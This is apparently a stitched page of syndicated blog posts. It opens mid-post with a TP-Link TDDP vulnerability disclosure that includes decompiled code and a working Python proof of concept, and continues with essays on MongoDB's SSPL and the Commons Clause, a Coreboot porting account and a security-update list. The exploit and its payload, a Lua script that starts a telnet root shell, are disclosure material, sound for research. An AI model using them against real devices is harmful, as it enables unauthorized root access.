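# post mentions are modelled; the rest of the packet layout is not.

CMD_FTEST_CONFIG = 0x31

def dispatch(packet: bytes) -> str:
    version = packet[0]
    if version == 2:
        return "v2: authenticated handler"
    if version == 1:
        # version 1 is unauthenticated: the second byte selects the command
        command = packet[1]
        if command == CMD_FTEST_CONFIG:
            return "v1: CMD_FTEST_CONFIG (tftp fetch + Lua execution)"
        return "v1: command %#x" % command
    return "unknown version"

print(dispatch(bytes([0x01, 0x31])))  # prints v1: CMD_FTEST_CONFIG (tftp fetch + Lua execution)
```

The important part is what's missing: nothing on the version 1 path ever checks who sent the packet.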

Here’s a cut down decompilation of the function:

int ftest_config(char *iParm1) {
  int lua_State;
  char *remote_address;
  int err;
  int luaerr;
  char filename[64];
  char configFile[64];
  char luaFile[64];
  int attempts;
  char *payload;

  attempts = 4;
  memset(luaFile,0,0x40);
  memset(configFile,0,0x40);
  memset(filename,0,0x40);
  lua_State = luaL_newstart();
  payload = iParm1 + 0xb027;
  if (payload != 0x00) {
    sscanf(payload,"%[^;];%s",luaFile,configFile);
    if ((luaFile[0] == 0) || (configFile[0] == 0)) {
      printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b);
    }
    else {
      remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4));
      tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address);
      sprintf(filename,"/tmp/%s",luaFile);
      while (0 < attempts) {
        sleep(1);
        err = access(filename,0);
        if (err == 0) break;
        attempts = attempts + -1;
      }
      if (attempts == 0) {
        printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename);
      }
      else {
        if (lua_State != 0) {
          luaL_openlibs(lua_State);
          luaerr = luaL_loadfile(lua_State,filename);
          if (luaerr == 0) {
            luaerr = lua_pcall(lua_State,0,0xffffffff,0);
          }
          lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr);
          lua_pushstring(lua_State,configFile);
          lua_pushstring(lua_State,remote_address);
          lua_call(lua_State,2,1);
        }
        lua_close(lua_State);
      }
    }
  }
}

Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address) which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear – once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the “Detailed description” field being limited to 500 characters. The page informed me that I’d hear back within three business days – a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else’s attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There are a couple of morals here:

  • Don’t default to running debug daemons on production firmware seriously how hard is this
  • If you’re going to have a security disclosure form, read it

Proof of concept:

#!/usr/bin/python3

# Copyright 2019 Google LLC.
# SPDX-License-Identifier: Apache-2.0
 
# Create a file in your tftp directory with the following contents:
#
#function config_test(config)
#  os.execute("telnetd -l /bin/login.sh")
#end
#
# Execute script as poc.py remoteaddr filename
 
import binascii
import socket
import sys
 
port_send = 1040
port_receive = 61000
 
tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 0
 
tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])
 
sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))
 
# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
argument = "%s;arbitrary" % sys.argv[2]
packet = packet + argument.encode()
sock_send.sendto(packet, (sys.argv[1], port_send))
sock_send.close()
 
response, addr = sock_receive.recvfrom(1024)
r = binascii.hexlify(response).decode()
print(r)

[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch


Initial thoughts on MongoDB’s new Server Side Public License

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/51230.html

MongoDB just announced that they were relicensing under their new Server Side Public License. This is basically the Affero GPL except with section 13 largely replaced with new text, as follows:

If you make the functionality of the Program or a modified version available to third parties as a service, you must make the Service Source Code available via network download to everyone at no charge, under the terms of this License. Making the functionality of the Program or modified version available to third parties as a service includes, without limitation, enabling third parties to interact with the functionality of the Program or modified version remotely through a computer network, offering a service the value of which entirely or primarily derives from the value of the Program or modified version, or offering a service that accomplishes for users the primary purpose of the Software or modified version.

“Service Source Code” means the Corresponding Source for the Program or the modified version, and the Corresponding Source for all programs that you use to make the Program or modified version available as a service, including, without limitation, management software, user interfaces, application program interfaces, automation software, monitoring software, backup software, storage software and hosting software, all such that a user could run an instance of the service using the Service Source Code you make available.

MongoDB admit that this license is not currently open source in the sense of being approved by the Open Source Initiative, but say: “We believe that the SSPL meets the standards for an open source license and are working to have it approved by the OSI.”

At the broadest level, AGPL requires you to distribute the source code of the AGPLed work[1], while the SSPL requires you to distribute the source code of everything involved in providing the service. Having a license place requirements around things that aren’t derived works of the covered code is unusual but not entirely unheard of – the GPL requires you to provide build scripts even if they’re not strictly derived works, and you could probably make an argument that the anti-Tivoisation provisions of GPL3 fall into this category.

A stranger point is that you’re required to provide all of this under the terms of the SSPL. If you have any code in your stack that can’t be released under those terms then it’s literally impossible for you to comply with this license. I’m not a lawyer, so I’ll leave it up to them to figure out whether this means you’re now only allowed to deploy MongoDB on BSD because the license would require you to relicense Linux away from the GPL. This feels sloppy rather than deliberate, but if it is deliberate then it’s a massively greater reach than any existing copyleft license.

You can definitely make arguments that this is just a maximalist copyleft license, the AGPL taken to extreme, and therefore it fits the open source criteria. But there’s a point where something is so far from the previously accepted scenarios that it’s actually something different, and should be examined as a new category rather than already approved categories. I suspect that this license has been written to conform to a strict reading of the Open Source Definition, and that any attempt by OSI to declare it as not being open source will receive pushback. But definitions don’t exist to be weaponised against the communities that they seek to protect, and a license that has overly onerous terms should be rejected even if that means changing the definition.

In general I am strongly in favour of licenses ensuring that users have the freedom to take advantage of modifications that people have made to free software, and I’m a fan of the AGPL. But my initial feeling is that this license is a deliberate attempt to make it practically impossible to take advantage of the freedoms that the license nominally grants, and this impression is strengthened by it being something that’s been announced with immediate effect rather than something that’s been developed with community input. I think there’s a bunch of worthwhile discussion to have about whether the AGPL is strong and clear enough to achieve its goals, but I don’t think that this SSPL is the answer to that – and I lean towards thinking that it’s not a good faith attempt to produce a usable open source license.

(It should go without saying that this is my personal opinion as a member of the free software community, and not that of my employer)

[1] There’s some complexities around GPL3 code that’s incorporated into the AGPLed work, but if it’s not part of the AGPLed work then it’s not covered


The Commons Clause doesn’t help the commons

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/51177.html

The Commons Clause was announced recently, along with several projects moving portions of their codebase under it. It’s an additional restriction intended to be applied to existing open source licenses with the effect of preventing the work from being sold[1], where the definition of being sold includes being used as a component of an online pay-for service. As described in the FAQ, this changes the effective license of the work from an open source license to a source-available license. However, the site doesn’t go into a great deal of detail as to why you’d want to do that.

Fortunately one of the VCs behind this move wrote an opinion article that goes into more detail. The central argument is that Amazon make use of a great deal of open source software and integrate it into commercial products that are incredibly lucrative, but give little back to the community in return. By adopting the commons clause, Amazon will be forced to negotiate with the projects before being able to use covered versions of the software. This will, apparently, prevent behaviour that is not conducive to sustainable open-source communities.

But this is where things get somewhat confusing. The author continues:

Our view is that open-source software was never intended for cloud infrastructure companies to take and sell. That is not the original ethos of open source.

which is a pretty astonishingly unsupported argument. Open source code has been incorporated into proprietary applications without giving back to the originating community since before the term open source even existed. MIT-licensed X11 became part of not only multiple Unixes, but also a variety of proprietary commercial products for non-Unix platforms. Large portions of BSD ended up in a whole range of proprietary operating systems (including older versions of Windows). The only argument in favour of this assertion is that cloud infrastructure companies didn’t exist at that point in time, so they weren’t taken into consideration[2] – but no argument is made as to why cloud infrastructure companies are fundamentally different to proprietary operating system companies in this respect. Both took open source code, incorporated it into other products and sold them on without (in most cases) giving anything back.

There’s one counter-argument. When companies sold products based on open source code, they distributed it. Copyleft licenses like the GPL trigger on distribution, and as a result selling products based on copyleft code meant that the community would gain access to any modifications the vendor had made – improvements could be incorporated back into the original work, and everyone benefited. Incorporating open source code into a cloud product generally doesn’t count as distribution, and so the source code disclosure requirements don’t trigger. So perhaps that’s the distinction being made?

Well, no. The GNU Affero GPL has a clause that covers this case – if you provide a network service based on AGPLed code then you must provide the source code in a similar way to if you distributed it under a more traditional copyleft license. But the article’s author goes on to say:

AGPL makes it inconvenient but does not prevent cloud infrastructure providers from engaging in the abusive behavior described above. It simply says that they must release any modifications they make while engaging in such behavior.

IE, the problem isn’t that cloud providers aren’t giving back code, it’s that they’re using the code without contributing financially. There’s no difference between what cloud providers are doing now and what proprietary operating system vendors were doing 30 years ago. The argument that “open source” was never intended to permit this sort of behaviour is simply untrue. The use of permissive licenses has always allowed large companies to benefit disproportionately when compared to the authors of said code. There’s nothing new to see here.

But that doesn’t mean that the status quo is good – the argument for why the commons clause is required may be specious, but that doesn’t mean it’s bad. We’ve seen multiple cases of open source projects struggling to obtain the resources required to make a project sustainable, even as many large companies make significant amounts of money off that work. Does the commons clause help us here?

As hinted at in the title, the answer’s no. The commons clause attempts to change the power dynamic of the author/user role, but it does so in a way that’s fundamentally tied to a business model and in a way that prevents many of the things that make open source software interesting to begin with. Let’s talk about some problems.

The power dynamic still doesn’t favour contributors

The commons clause only really works if there’s a single copyright holder – if not, selling the code requires you to get permission from multiple people. But the clause does nothing to guarantee that the people who actually write the code benefit, merely that whoever holds the copyright does. If I rewrite a large part of a covered work and that code is merged (presumably after I’ve signed a CLA that assigns a copyright grant to the project owners), I have no power in any negotiations with any cloud providers. There’s no guarantee that the project stewards will choose to reward me in any way. I contribute to them but get nothing back in return – instead, my improved code allows the project owners to charge more and provide stronger returns for the VCs. The inequity has shifted, but individual contributors still lose out.

It discourages use of covered projects

One of the benefits of being able to use open source software is that you don’t need to fill out purchase orders or start commercial negotiations before you’re able to deploy. Turns out the project doesn’t actually fill your needs? Revert it, and all you’ve lost is some development time. Adding additional barriers is going to reduce uptake of covered projects, and that does nothing to benefit the contributors.

You can no longer meaningfully fork a project

One of the strengths of open source projects is that if the original project stewards turn out to violate the trust of their community, someone can fork it and provide a reasonable alternative. But if the project is released with the commons clause, it’s impossible to sell any forked versions – anyone who wishes to do so would still need the permission of the original copyright holder, and they can refuse that in order to prevent a fork from gaining any significant uptake.

It doesn’t inherently benefit the commons

The entire argument here is that the cloud providers are exploiting the commons, and by forcing them to pay for a license that allows them to make use of that software the commons will benefit. But there’s no obvious link between these things. Maybe extra money will result in more development work being done and the commons benefiting, but maybe extra money will instead just result in greater payout to shareholders. Forcing cloud providers to release their modifications to the wider world would be of benefit to the commons, but this is explicitly ruled out as a goal. The clause isn’t inherently incompatible with this – the negotiations between a vendor and a project to obtain a license to be permitted to sell the code could include a commitment to provide patches rather than money, for instance, but the focus on money makes it clear that this wasn’t the authors’ priority.

What we’re left with is a license condition that does nothing to benefit individual contributors or other users, and costs us the opportunity to fork projects in response to disagreements over design decisions or governance. What it does is ensure that a range of VC-backed projects are in a better position to improve their returns, without any guarantee that the commons will be left better off. It’s an attempt to solve a problem that’s existed since before the term “open source” was even coined, by simply layering on a business model that’s also existed since before the term “open source” was even coined[3]. It’s not anything new, and open source derives from an explicit rejection of this sort of business model.

That’s not to say we’re in a good place at the moment. It’s clear that there is a giant level of power disparity between many projects and the consumers of those projects. But we’re not going to fix that by simply discarding many of the benefits of open source and going back to an older way of doing things. Companies like Tidelift[4] are trying to identify ways of making this sustainable without losing the things that make open source a better way of doing software development in the first place, and that’s what we should be focusing on rather than just admitting defeat to satisfy a small number of VC-backed firms that have otherwise failed to develop a sustainable business model.

[1] It is unclear how this interacts with licenses that include clauses that assert you can remove any additional restrictions that have been applied
[2] Although companies like Hotmail were making money from running open source software before the open source definition existed, so this still seems like a reach
[3] “Source available” predates my existence, let alone any existing open source licenses
[4] Disclosure: I know several people involved in Tidelift, but have no financial involvement in the company


Porting Coreboot to the 51NB X210

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/50924.html

The X210 is a strange machine. A set of Chinese enthusiasts developed a series of motherboards that slot into old Thinkpad chassis, providing significantly more up-to-date hardware. The X210 has a Kabylake CPU, supports up to 32GB of RAM, has an NVMe-capable M.2 slot and has eDP support – and it fits into an X200 or X201 chassis, which means it also comes with a classic Thinkpad keyboard. We ordered some from a Facebook page (a process that involved wiring a large chunk of money to a Chinese bank which wasn’t at all stressful), and a couple of weeks later they arrived. Once I’d put mine together I had a quad-core i7-8550U with 16GB of RAM, a 512GB NVMe drive and a 1920×1200 display. I’d transplanted over the drive from my XPS13, so I was running stock Fedora for most of this development process.

The other fun thing about it is that none of the firmware flashing protection is enabled, including Intel Boot Guard. This means running a custom firmware image is possible, and what would a ridiculous custom Thinkpad be without ridiculous custom firmware? A shadow of its potential, that’s what. So, I read the Coreboot[1] motherboard porting guide and set to.

My life was made a great deal easier by the existence of a port for the Purism Librem 13v2. This is a Skylake system, and Skylake and Kabylake are very similar platforms. So, the first job was to copy that into a new directory and start from there. Next, I updated the Inteltool utility so it understood the chipset – this commit shows what was necessary there. It’s mostly just adding new PCI IDs, but it also needed some adjustment to account for the GPIO allocation being different on mobile parts when compared to desktop ones. One thing that bit me – Inteltool relies on being able to mmap() arbitrary bits of physical address space, and the kernel doesn’t allow that if CONFIG_STRICT_DEVMEM is enabled. I had to disable that first.

The GPIO pins got dropped into gpio.h. I ended up just pushing the raw values into there rather than parsing them back into more semantically meaningful definitions, partly because I don’t understand what these things do that well and largely because I’m lazy. Once that was done, on to the next step.

High Definition Audio (HDA) devices have a standard interface, but the codecs attached to the HDA device vary – both in their own configuration and in how the board designer has wired them up. Thankfully the existing configuration could be copied from /sys/class/sound/card0/hwC0D0/init_pin_configs[2] and then hda_verb.h could be updated.
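That copying step is mostly mechanical, so here’s a sketch of it (not the actual tool used for the port): the kernel dump is one “pin NID, default config” pair per line, and coreboot’s hda_verb.h files express the same data as AZALIA_PIN_CFG entries. The codec address of 0 is an assumption.

```python
# Sketch: convert the kernel's init_pin_configs dump into
# coreboot-style AZALIA_PIN_CFG entries for hda_verb.h.

def pin_configs_to_verbs(dump: str, codec: int = 0) -> list:
    """dump is the text of /sys/class/sound/card0/hwC0D0/init_pin_configs:
    one "0xNN 0xNNNNNNNN" (pin NID, default config) pair per line."""
    verbs = []
    for line in dump.splitlines():
        if not line.strip():
            continue
        nid, cfg = (int(tok, 16) for tok in line.split())
        verbs.append("\tAZALIA_PIN_CFG(%d, 0x%02x, 0x%08x)," % (codec, nid, cfg))
    return verbs

sample = "0x12 0x40000000\n0x14 0x90170110\n"
for verb in pin_configs_to_verbs(sample):
    print(verb)
```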

One more piece of hardware-specific configuration is the Video BIOS Table, or VBT. This contains information used by the graphics drivers (firmware or OS-level) to configure the display correctly, and again is somewhat system-specific. This can be grabbed from /sys/kernel/debug/dri/0/i915_vbt.

A lot of the remaining platform-specific configuration has been split out into board-specific config files, and this also needed updating. Most stuff was the same, but I confirmed the GPE and genx_dec register values by using Inteltool to dump them from the vendor system and copying them over. lspci -t gave me the bus topology and told me which PCIe root ports were in use, and lsusb -t gave me port numbers for USB. That let me update the root port and USB tables.

The final code update required was to tell the OS how to communicate with the embedded controller. Various ACPI functions are actually handled by this autonomous device, but it’s still necessary for the OS to know how to obtain information from it. This involves writing some ACPI code, but that’s largely a matter of cutting and pasting from the vendor firmware – the EC layout depends on the EC firmware rather than the system firmware, and we weren’t planning on changing the EC firmware in any way. Using ifdtool told me that the vendor firmware image wasn’t using the EC region of the flash, so my assumption was that the EC had its own firmware stored somewhere else. I was ready to flash.

The first attempt involved isis’ machine, using their Beaglebone Black as a flashing device – the lack of protection in the firmware meant we ought to be able to get away with using flashrom directly on the host SPI controller, but using an external flasher meant we stood a better chance of being able to recover if something went wrong. We flashed, plugged in the power and… nothing. Literally. The power LED didn’t turn on. The machine was very, very dead.

Things like managing battery charging and status indicators are up to the EC, and the complete absence of anything going on here meant that the EC wasn’t running. The most likely reason for that was that the system flash did contain the EC’s firmware even though the descriptor said it didn’t, and now the system was very unhappy. Worse, the flash wouldn’t speak to us any more – the power supply from the Beaglebone to the flash chip was sufficient to power up the EC, and the EC was then holding onto the SPI bus desperately trying to read its firmware. Bother. This was made rather more embarrassing because isis had explicitly raised concern about flashing an image that didn’t contain any EC firmware, and now I’d killed their laptop.

After some digging I was able to find EC firmware for a related 51NB system, and looking at that gave me a bunch of strings that seemed reasonably identifiable. Looking at the original vendor ROM showed very similar code located at offset 0x00200000 into the image, so I added a small tool to inject the EC firmware (basing it on an existing tool that does something similar for the EC in some HP laptops). I now had an image that I was reasonably confident would get further, but we couldn’t flash it. Next step seemed like it was going to involve desoldering the flash from the board, which is a colossal pain. Time to sleep on the problem.
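The injection itself is simple enough to sketch. The offset comes from where the EC code was found in the vendor image; the function name and error handling are illustrative, and the real tool lives in the coreboot tree.

```python
# Sketch: splice an EC firmware blob into a full ROM image at the
# offset where the vendor image keeps it.

EC_OFFSET = 0x00200000  # observed location of EC code in the vendor ROM

def inject_ec(rom: bytes, ec: bytes, offset: int = EC_OFFSET) -> bytes:
    """Return a copy of rom with ec written at offset."""
    if offset + len(ec) > len(rom):
        raise ValueError("EC blob does not fit at the given offset")
    out = bytearray(rom)
    out[offset:offset + len(ec)] = ec
    return bytes(out)
```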

The next morning we were able to borrow a Dediprog SPI flasher. These are much faster than doing SPI over GPIO lines, and also support running the flash at different voltages. At 3.5V the behaviour was the same as we’d seen the previous night – nothing. According to the datasheet, the flash required at least 2.7V to run, but flashrom listed 1.8V as the next lower voltage so we tried. And, amazingly, it worked – not reliably, but sufficiently. Our hypothesis is that the chip is marginally able to run at that voltage, but that the EC isn’t – we were no longer powering the EC up, so we could communicate with the flash. After a couple of attempts we were able to write enough that we had EC firmware on there, at which point we could shift back to flashing at 3.5V because the EC was leaving the flash alone.

So, we flashed again. And, amazingly, we ended up staring at a UEFI shell prompt[3]. USB wasn’t working, and nor was the onboard keyboard, but we had graphics and were executing actual firmware code. I was able to get USB working fairly quickly – it turns out that Linux numbers USB ports from 1 and the FSP numbers them from 0, and fixing that up gave us working USB. We were able to boot Linux! Except there were a whole bunch of errors complaining about EC timeouts, and also we only had half the RAM we should.

After some discussion on the Coreboot IRC channel, we figured out the RAM issue – the Librem13 only has one DIMM slot. The FSP expects to be given a set of i2c addresses to probe, one for each DIMM socket. It is then able to read back the DIMM configuration and configure the memory controller appropriately. Running i2cdetect against the system SMBus gave us a range of devices, including one at 0x50 and one at 0x52. The detected DIMM was at 0x50, which made 0x52 seem like a reasonable bet – and grepping the tree showed that several other systems used 0x52 as the address for their second socket. Adding that to the list of addresses and passing it to the FSP gave us all our RAM.
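The logic here can be sketched in a few lines: JEDEC places SPD EEPROMs in the 0x50–0x57 i2c range, one per DIMM socket, so anything i2cdetect reports in that window is a plausible socket to hand to the FSP. The function and the example device set are illustrative, not the actual coreboot change.

```python
# Sketch: pick plausible SPD EEPROM addresses out of the devices
# i2cdetect reported on the SMBus. SPD EEPROMs live at 0x50-0x57.

SPD_RANGE = range(0x50, 0x58)

def spd_addresses(smbus_devices) -> list:
    return [addr for addr in sorted(smbus_devices) if addr in SPD_RANGE]

# The X210's SMBus showed (among others) devices at 0x50 and 0x52:
print(spd_addresses({0x08, 0x44, 0x50, 0x52}))  # prints [80, 82], i.e. 0x50 and 0x52
```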

So, now we just had to deal with the EC. One thing we noticed was that if we flashed the vendor firmware, ran it, flashed Coreboot and then rebooted without cutting the power, the EC worked. This strongly suggested that there was some setup code happening in the vendor firmware that configured the EC appropriately, and if we duplicated that it would probably work. Unfortunately, figuring out what that code was was difficult. I ended up dumping the PCI device configuration for the vendor firmware and for Coreboot in case that would give us any clues, but the only thing that seemed relevant at all was that the LPC controller was configured to pass io ports 0x4e and 0x4f to the LPC bus with the vendor firmware, but not with Coreboot. Unfortunately the EC was supposed to be listening on 0x62 and 0x66, so this wasn’t the problem.

I ended up solving this by using UEFITool to extract all the code from the vendor firmware, then disassembling every object and grepping it for port IO. x86 systems have two separate address spaces – memory and port IO. Port IO is well suited to simple devices that don’t need a lot of bandwidth, and the EC is definitely one of these – there’s no way to talk to it other than using port IO, so any configuration was almost certainly happening that way. I found a whole bunch of stuff that touched the EC, but was clearly depending on it already having been enabled. I found a wide range of cases where port IO was being used for early PCI configuration. And, finally, I found some code that reconfigured the LPC bridge to route 0x4e and 0x4f to the LPC bus (explaining the configuration change I’d seen earlier), and then wrote a bunch of values to those addresses. I mimicked those, and suddenly the EC started responding.

It turns out that the writes that made this work weren’t terribly magic. PCs used to have a SuperIO chip that provided most of the legacy port functionality, including the floppy drive controller and parallel and serial ports. Individual components (called logical devices, or LDNs) could be enabled and disabled using a sequence of writes that was fairly consistent between vendors. Someone on the Coreboot IRC channel recognised that the writes that enabled the EC were simply using that protocol to enable a series of LDNs, which apparently correspond to things like “Working EC” and “Working keyboard”. And with that, we were done.
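That protocol is compact enough to sketch as the sequence of (port, value) writes it generates. The index/data pair (0x4e/0x4f here) and registers 0x07 (LDN select) and 0x30 (activate) are the common SuperIO convention; the LDN numbers themselves, and any unlock sequence a given chip wants first, are chip-specific and not shown.

```python
# Sketch: the conventional SuperIO "enable a logical device" sequence,
# expressed as the port writes it produces rather than performed
# against real hardware.

INDEX, DATA = 0x4E, 0x4F  # config ports routed to the LPC bus above

def enable_ldn(ldn: int) -> list:
    return [
        (INDEX, 0x07), (DATA, ldn),   # register 0x07 selects the LDN
        (INDEX, 0x30), (DATA, 0x01),  # register 0x30 bit 0 activates it
    ]
```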

Coreboot doesn’t currently have ACPI support for the latest Intel graphics chipsets, so right now my image doesn’t have working backlight control. But other than that, everything seems to work (although there’s probably a bunch of power management optimisation to do). I started this process knowing almost nothing about Coreboot, but thanks to the help of people on IRC I was able to get things working in about two days of work[4] and now have firmware that’s about as custom as my laptop.

[1] Why not Libreboot? Because modern Intel SoCs haven’t had their memory initialisation code reverse engineered, so the only way to boot them is to use the proprietary Intel Firmware Support Package.
[2] Card 0, device 0
[3] After a few false starts – it turns out that the initial memory training can take a surprisingly long time, and we kept giving up before that had happened
[4] Spread over 5 or so days of real time


Security updates for Monday

Post Syndicated from ris original https://lwn.net/Articles/756489/rss

Security updates have been issued by CentOS (procps, xmlrpc, and xmlrpc3), Debian (batik, prosody, redmine, wireshark, and zookeeper), Fedora (jasper, kernel, poppler, and xmlrpc), Mageia (git and wireshark), Red Hat (rh-java-common-xmlrpc), Slackware (git), SUSE (bzr, dpdk-thunderxdpdk, and ocaml), and Ubuntu (exempi).